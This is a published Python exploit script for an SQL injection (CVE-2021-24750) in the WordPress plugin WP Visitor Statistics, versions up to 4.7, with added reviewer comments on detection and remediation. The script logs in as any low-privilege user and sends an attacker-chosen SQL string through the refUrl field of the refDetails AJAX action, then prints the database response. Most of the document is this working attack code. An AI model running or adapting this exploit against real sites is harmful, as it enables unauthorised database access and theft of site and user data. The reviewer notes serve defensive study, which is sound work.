# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
# Date: 22/12/2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.plugins-market.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
# Version: <= 4.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24750
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md
#
# Reviewer notes (defensive context):
# - What this script demonstrates: after a normal wp-login.php form login,
#   a single GET to wp-admin/admin-ajax.php with action=refDetails carries
#   the -C/--COMMAND value inside the refUrl field of the `requests` JSON
#   parameter, prefixed by a single quote.  That is the unsanitised input the
#   description below refers to (CWE-89).
# - Affected versions per this header: <= 4.7.  Remediation is updating the
#   plugin to a release the vendor advisory lists as fixed; the fixed version
#   is not stated on this page.
# - Detection: the request shape is visible in web-server / WAF logs as an
#   authenticated GET to admin-ajax.php?action=refDetails whose `requests`
#   parameter contains a quote character in refUrl.  The User-Agent and
#   Accept-* headers set below are fixed strings chosen by the client and are
#   not a reliable indicator on their own.
# - Because the action is reachable by any authenticated user (subscriber
#   role, per the description), limiting self-registration and reviewing
#   low-privilege accounts reduces exposure until the plugin is updated.

'''
Description:
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks
'''

# Banner:
# NOTE(review): the ASCII art below was whitespace-mangled in the copy this
# was restored from; line breaks are a best-effort reconstruction.
banner = '''
 ___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \
( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) )
\___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/
[+] WP Visitor Statistics SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)

# Imports follow the banner print on purpose in the original; left as-is.
import argparse
import requests
from datetime import datetime

# User-Input:
# All six options are plain strings with no defaults; argparse leaves any
# omitted option as None, and the string concatenations below would then
# raise TypeError rather than produce a request.
my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
my_parser.add_argument('-C', '--COMMAND', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH  # used for the login URL only; see the exploit URL below
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND  # inserted verbatim into the refUrl field further down
print('')
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('')

# Authentication:
# One requests.Session carries the WordPress login cookies from the POST
# below into the later admin-ajax GET, which is what makes that GET
# "authenticated".
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Initial GET of the login page; the response is not inspected afterwards
# (presumably done to pick up any cookies the page sets — not verified here).
check = session.get(auth_url)

# Header:
# Fixed browser-like headers.  'Host' and 'Origin' are built from target_ip
# without the port, while the URLs themselves include target_port.
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
# Standard wp-login.php form fields.
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
# The login response is not checked; the script continues whether or not
# the credentials were accepted.
auth = session.post(auth_url, headers=header, data=body)

# Exploit:
# Single GET to the vulnerable AJAX action.  The `requests` query parameter
# is a JSON object whose refUrl value is a single quote, a space, then the
# --COMMAND string unchanged.  Note the '/wordpress/' path segment is
# hard-coded here, unlike auth_url which is built from wp_path.
exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
exploit = session.get(exploit_url)
# The raw response body is printed as-is; nothing is parsed from it.
print(exploit.text)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))